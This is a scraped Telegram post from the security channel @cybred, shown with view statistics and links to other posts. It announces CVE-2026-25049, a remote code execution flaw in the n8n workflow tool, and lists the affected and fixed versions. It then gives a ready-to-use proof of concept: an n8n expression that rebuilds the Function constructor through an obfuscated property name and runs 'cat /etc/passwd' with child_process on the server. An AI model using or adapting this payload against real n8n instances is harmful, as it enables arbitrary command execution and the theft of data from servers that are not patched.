🔥 [10/10] CVE-2026-25049: RCE в n8n Это обход для всех пред — @cybred

@cybred10.2K подп.

6.1Kпросмотров

60.1%от подписчиков

5 февраля 2026 г.

stats📷 ФотоScore: 6.7K

🔥 [10/10] CVE-2026-25049: RCE в n8n Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере. Уязвимы версии: — <1.123.17 (исправлено в 1.123.17) — <2.5.2 (исправлено в 2.5.2) PoC 1. Создаем workflow 2. Добавляем Edit Field 3. Указываем в String (Expression) {{(() => { const { [constr${'uct'}or]: Fn } = Object; const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();"; return Fn(payload)(); })()}} 4. Нажимаем Execute Step

6.1K

просмотров

566

символов

Нет

эмодзи

Да

медиа

Другие посты @cybred

А мы и не думали Клиент Telega, который используют россияне, чтобы "обходить" блокировку Telegram,👁 15.7K Red Team Infrastructure The Full Picture Это самый полный гайд в 2026 году по созданию современной,👁 14.6K Еще даже не успели присвоить CVE В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (👁 9.7K Выложили доклады с конференции DEF CON 33. Она прошла в Лас-Вегасе и оказалась одной из самых крупны👁 8.2K Это Кира, только без тетради Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленны👁 7.7K

Все посты канала →

Аналитика канала База постов